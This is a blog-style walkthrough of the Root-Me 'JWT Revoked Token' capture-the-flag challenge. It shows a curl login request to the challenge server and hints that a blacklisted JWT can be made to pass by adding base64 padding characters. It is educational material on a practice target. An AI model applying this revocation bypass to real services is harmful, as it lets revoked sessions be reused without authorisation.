Thứ Sáu, 22 tháng 5, 2020

[Root-Me] JWT Revoked Token

Hi guys , after nearly 2 months dont care about Root Me challenges , I come back to it and realize that some challenges have been added to Web Serveur catalog recently . I decide to play with JWT again . 😃



25 Points , not too much hard  , huh? I though so . And after solved this chall , I have to say : " It's not really hard , but so much tricky" . Let's see !





Base on the links and methods given , I enter into it .





Of course this method is not accepted ! I turn on Zap 2.9.0 my babe to send a request to this Url by POST method :





Ok! next step , I will send a request which contains credential data that they ask . Of course, json data.


{"data":{"username":"admin","password":"admin"}}

but I receive same result : Bad request ! 
After some minutes, I realize that I must add to request a header when sending json data 


Content-Type: application/json


Okay , a little bit difference 😂

When I review the source code , I ensure that when we send credential to server , web server should be sent back the access token .




But I dont see any more and have no idea where it is .
Trick 1 : Use Curl

After googling and reviewing the source code , I decide to use Curl command to resend data to server
curl -H "Content-Type: Application/json" -X POST -d '{"username":"admin","password":"admin"}' http://challenge01.root-me.org/web-serveur/ch63/login
 And I got the access token !





If you immediately submit this JWT token, you will lose it . Seriously , I can prove it right now 😄





When the server generate you a token , the token is sent to blacklist immediately! So, if you send it to server without any edit , it must be revoked .

I try many times with many things including write a payload , crack the JWT token and every crazy thing that I can do , it still not work ! the server doesnt accept any token that edited, craked ,etc . The main issue that you must send the edited token but the server doesnt know or find the difference . But how ?

Trick 2: RFC 4648

And fortunately , I figure out after half a day stucking . I must change directly the token, not the content of it . 
HINT : JWT made of Base 64 encoding , right ?my name : 4rth4s =>  NHJ0aDRz base64 encode , and NHJ0aDRz is similar to NHJ0aDRz== in some cases , right?You have 3 minutes to change it. 
Keep going , I got the flag 😇
Hope you will !







Happy Hacking!





Phổ Biến

Follow by Email